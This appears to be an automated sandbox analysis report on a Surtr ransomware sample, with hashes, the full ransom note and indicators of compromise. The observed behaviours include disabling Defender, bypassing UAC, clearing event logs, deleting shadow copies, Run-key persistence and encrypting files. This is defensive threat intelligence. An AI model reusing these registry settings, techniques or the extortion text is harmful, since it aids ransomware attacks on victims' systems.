surtr | 805cb28b3e595afe97a6e4ac5051ca11b34d72f4dff2af4581cf74a6b126af43

Analysis

max time kernel
121s
max time network
124s
platform
windows7_x64
resource
win7-20250207-en
resource tags

arch:x64arch:x86image:win7-20250207-enlocale:en-usos:windows7-x64system
submitted
06/03/2025, 02:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
Size

1.3MB
MD5

6c2b5d1e5204f83e16265da3600d48e0
SHA1

dc40c80e3444ca688779cd81a2b93964fa909b89
SHA256

805cb28b3e595afe97a6e4ac5051ca11b34d72f4dff2af4581cf74a6b126af43
SHA512

5d2eb6e70eda83e491bbc993eec57c35245a9340f6526e6e0abad3c1ebe0c3457e0efc5c6012463ece384de771bb76b3e3f0cf8357a8e71f7c7ac18d66af4e78
SSDEEP

24576:rdtwbXPGBkNXi/Z479uN0/XuNRMLDy5VURkmqpK1Oshy1ZT2rpo3NahUXz+xRE3n:rxLyEuPFvN/a

Score

10^/10

surtr credential_access defense_evasion discovery evasion execution impact persistence ransomware spyware stealer trojan

Malware Config

Extracted

Path

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta

Family

surtr

Ransom Note

SurtrRansomware OOPS ALL YOUR IMPORTANT FILES HAVE BEEN ENCRYPTED AND STOLEN !! Notice : There is only one way to restore your data read the boxes carefully! Attention : Do Not change file names. Do Not try to decrypt using third party softwares , it may cause permanent data loss . your files will be sold on the Dark Web after 15 days. Imagine 1 million hackers have all your information including files, IP, name and number and location and ... Do not pay any money before decrypting the test files. You can use our 50% discount if you pay the fee within first 15 days of encryption . otherwise the price will be doubled. In order to warranty you , our team will decrypt 3 of your desired files for free.but you need to pay the specified price for the rest of the operation . How To Decrypt : Your system is offline . in order to contact us you can email this address [email protected] use this ID (tgOZOYx3gur9jx) for the title of your email . If you weren't able to contact us within 24 hours please email : [email protected] If you didn't get any respond within 48 hours use this link (Not Available Now).send your ID and your cryptor name (SurtrRansomwareUserName) therefore we can create another way to contact you as soon as possible

Emails

[email protected]

Signatures

Detects Surtr Payload 2 IoCs

resource	yara_rule
behavioral1/memory/2624-0-0x0000000140000000-0x000000014015C000-memory.dmp	family_surtr
behavioral1/files/0x0003000000005a8c-30.dat	family_surtr

Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe

Surtr
Ransomware family first seen in late 2021.
ransomware surtr
Surtr family
surtr

UAC bypass 3 TTPs 1 IoCs

defense_evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Clears Windows event logs 1 TTPs 64 IoCs

defense_evasion ransomware

Clear Windows Event Logs

T1070.001

pid	Process
2560	wevtutil.exe
4028	wevtutil.exe
4056	wevtutil.exe
328	wevtutil.exe
5728	wevtutil.exe
5828	wevtutil.exe
6596	wevtutil.exe
200	Process not Found
2564	wevtutil.exe
204	wevtutil.exe
6800	Process not Found
3720	Process not Found
5372	wevtutil.exe
3960	wevtutil.exe
6012	wevtutil.exe
3796	wevtutil.exe
2840	wevtutil.exe
5852	wevtutil.exe
4280	Process not Found
4708	wevtutil.exe
3416	wevtutil.exe
7028	wevtutil.exe
3844	wevtutil.exe
1968	Process not Found
4392	Process not Found
5096	wevtutil.exe
6304	wevtutil.exe
7016	Process not Found
3380	Process not Found
3096	Process not Found
7044	wevtutil.exe
3136	wevtutil.exe
2060	wevtutil.exe
5604	wevtutil.exe
4268	Process not Found
6624	wevtutil.exe
7024	Process not Found
1132	wevtutil.exe
6360	wevtutil.exe
5956	wevtutil.exe
3716	wevtutil.exe
3560	wevtutil.exe
3552	wevtutil.exe
6140	Process not Found
3176	Process not Found
3268	wevtutil.exe
4020	wevtutil.exe
6436	wevtutil.exe
3604	wevtutil.exe
6236	wevtutil.exe
1484	Process not Found
6696	wevtutil.exe
4936	wevtutil.exe
4764	wevtutil.exe
2292	wevtutil.exe
5772	wevtutil.exe
6208	Process not Found
3348	Process not Found
3460	wevtutil.exe
2532	wevtutil.exe
5548	wevtutil.exe
4172	wevtutil.exe
4608	wevtutil.exe
3156	wevtutil.exe

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
2544	bcdedit.exe
3064	bcdedit.exe

Renames multiple (9646) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Blocklisted process makes network request 7 IoCs

flow	pid	Process
8	4476	Process not Found
9	4476	Process not Found
12	4476	Process not Found
13	4476	Process not Found
14	4476	Process not Found
16	4476	Process not Found
18	4476	Process not Found

Disables Task Manager via registry modification
defense_evasion
Disables use of System Restore points 1 TTPs
defense_evasion

Inhibit System Recovery
T1490
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
credential_access stealer

Windows Credential Manager
T1555.004

Drops startup file 7 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	Process not Found
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt	cmd.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchos1 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchos2 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\svchos3 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\svchos4 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\I:	Process not Found
File opened (read-only)	\??\P:	Process not Found
File opened (read-only)	\??\Q:	Process not Found
File opened (read-only)	\??\Q:	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\G:	Process not Found
File opened (read-only)	\??\Z:	Process not Found
File opened (read-only)	\??\K:	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened (read-only)	\??\Z:	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened (read-only)	\??\O:	Process not Found
File opened (read-only)	\??\Q:	Process not Found
File opened (read-only)	\??\V:	Process not Found
File opened (read-only)	\??\B:	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened (read-only)	\??\H:	Process not Found
File opened (read-only)	\??\L:	Process not Found
File opened (read-only)	\??\T:	Process not Found
File opened (read-only)	\??\S:	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened (read-only)	\??\L:	Process not Found
File opened (read-only)	\??\M:	Process not Found
File opened (read-only)	\??\W:	Process not Found
File opened (read-only)	\??\X:	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened (read-only)	\??\G:	Process not Found
File opened (read-only)	\??\W:	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened (read-only)	\??\D:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\H:	Process not Found
File opened (read-only)	\??\V:	Process not Found
File opened (read-only)	\??\Y:	Process not Found
File opened (read-only)	\??\Z:	Process not Found
File opened (read-only)	\??\I:	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened (read-only)	\??\R:	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened (read-only)	\??\E:	Process not Found
File opened (read-only)	\??\S:	Process not Found
File opened (read-only)	\??\Y:	Process not Found
File opened (read-only)	\??\E:	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened (read-only)	\??\J:	Process not Found
File opened (read-only)	\??\J:	Process not Found
File opened (read-only)	\??\H:	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened (read-only)	\??\O:	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened (read-only)	\??\U:	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened (read-only)	\??\K:	Process not Found
File opened (read-only)	\??\O:	Process not Found
File opened (read-only)	\??\P:	Process not Found
File opened (read-only)	\??\S:	Process not Found
File opened (read-only)	\??\T:	Process not Found
File opened (read-only)	\??\M:	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened (read-only)	\??\T:	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened (read-only)	\??\Y:	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened (read-only)	\??\N:	Process not Found
File opened (read-only)	\??\R:	Process not Found
File opened (read-only)	\??\U:	Process not Found
File opened (read-only)	\??\X:	Process not Found
File opened (read-only)	\??\A:	Process not Found
File opened (read-only)	\??\D:	Process not Found
File opened (read-only)	\??\X:	Process not Found
File opened (read-only)	\??\B:	Process not Found
File opened (read-only)	\??\N:	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened (read-only)	\??\P:	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened (read-only)	\??\V:	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened (read-only)	\??\E:	Process not Found
File opened (read-only)	\??\N:	Process not Found
File opened (read-only)	\??\W:	Process not Found
File opened (read-only)	\??\K:	Process not Found
File opened (read-only)	\??\M:	Process not Found

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
2	ip-api.com

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135

Power Settings 1 TTPs 1 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
6008	wevtutil.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 6 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4776	Process not Found
4596	Process not Found
4668	Process not Found
4716	Process not Found
4984	Process not Found
4440	Process not Found

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\Service\\SurtrBackGround.jpg"	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\reflect.png.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Noronha.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-appui.xml.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\UIAutomationTypes.dll.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ku_IQ\LC_MESSAGES\vlc.mo.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\codec\libcc_plugin.dll.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\msadc\msaddsr.dll.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PROOF\1036\MSGR3FR.DLL.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\bandwidth.png.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Argentina\Tucuman.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\ink\es-ES\InkObj.dll.mui.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382955.JPG.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\MOR6INT.REST.IDX_DLL.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\DocumentShare\WSSFilesToolHomePageBackground.jpg.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL044.XML.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-windows.xml.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\SectionHeading.jpg.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\de-DE\css\settings.css.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\rockbox_fm_presets.luac.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\Help\1046\hxdsui.dll.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00361_.WMF.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0186364.WMF.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\bg_OliveGreen.gif.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\REMINDER.WAV.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\calendar.html.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\feedback.gif.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7Handle.png.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\updater_zh_CN.jar.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files\Mozilla Firefox\dependentlibs.list.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\MakeAccessible.api.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\VC\msdia90.dll.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0239941.WMF.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0282932.WMF.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD19988_.WMF.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\NL7Data0011.DLL.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\FLYERHM.POC.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\es\System.Xml.Linq.Resources.dll.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\license.html.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\ink\en-US\TipBand.dll.mui.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01163_.WMF.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\BHOINTL.DLL.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_Premium.gif.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\ONENOTE.EXE.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\images\dial.png.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\fr-FR\js\settings.js.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107132.WMF.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387604.JPG.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01299_.GIF.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\MLA.XSL.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDRESN.CFG.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\AD.XML.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Stationery\1033\OFFISUPP.HTM.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\EquityReport.Dotx.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata.ja_5.5.0.165303.jar.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Pacific\Nauru.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\ja-JP\gadget.xml.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00166_.WMF.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\MENUS.JS.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\16_9-frame-overlay.png.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0151067.WMF.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115842.GIF.[[email protected]].SURT	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found

System Time Discovery 1 TTPs 3 IoCs

Adversary may gather the system time and/or time zone settings from a local or remote system.

discovery

System Time Discovery

T1124

pid	Process
2920	cmd.exe
2704	net.exe
1412	net1.exe

Interacts with shadow copies 3 TTPs 53 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
3860	Process not Found
2440	vssadmin.exe
2760	vssadmin.exe
1660	Process not Found
3504	Process not Found
3596	Process not Found
920	Process not Found
5344	Process not Found
2528	Process not Found
4092	Process not Found
4036	Process not Found
2272	Process not Found
584	Process not Found
5808	Process not Found
5908	Process not Found
6008	Process not Found
6048	Process not Found
5092	Process not Found
3160	Process not Found
2592	Process not Found
3928	Process not Found
4016	Process not Found
5288	Process not Found
5852	Process not Found
5944	Process not Found
4904	Process not Found
2556	Process not Found
712	Process not Found
1544	Process not Found
5504	Process not Found
5620	Process not Found
2224	vssadmin.exe
5068	Process not Found
3164	Process not Found
2376	Process not Found
1708	Process not Found
1948	Process not Found
3708	Process not Found
5228	Process not Found
4056	Process not Found
4796	Process not Found
3112	Process not Found
1944	Process not Found
1972	Process not Found
2632	Process not Found
5432	Process not Found
6132	Process not Found
1336	Process not Found
2964	Process not Found
5456	Process not Found
5728	Process not Found
2908	Process not Found
1932	Process not Found

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Internet Explorer\Main	Process not Found

Modifies registry class 5 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.surt\ = "surt_auto_file"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\surt_auto_file\DefaultIcon	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\surt_auto_file	Process not Found
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\surt_auto_file\DefaultIcon\ = "C:\\ProgramData\\Service\\SurtrIcon.ico"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.surt	Process not Found

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
4544	Process not Found

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2504	schtasks.exe
1132	schtasks.exe
4344	Process not Found

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
4476	Process not Found

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2624	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
2624	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
2624	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
2624	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
2624	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
2624	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeBackupPrivilege	2828	vssvc.exe
Token: SeRestorePrivilege	2828	vssvc.exe
Token: SeAuditPrivilege	2828	vssvc.exe
Token: SeSecurityPrivilege	3388	wevtutil.exe
Token: SeBackupPrivilege	3388	wevtutil.exe
Token: SeSecurityPrivilege	3460	wevtutil.exe
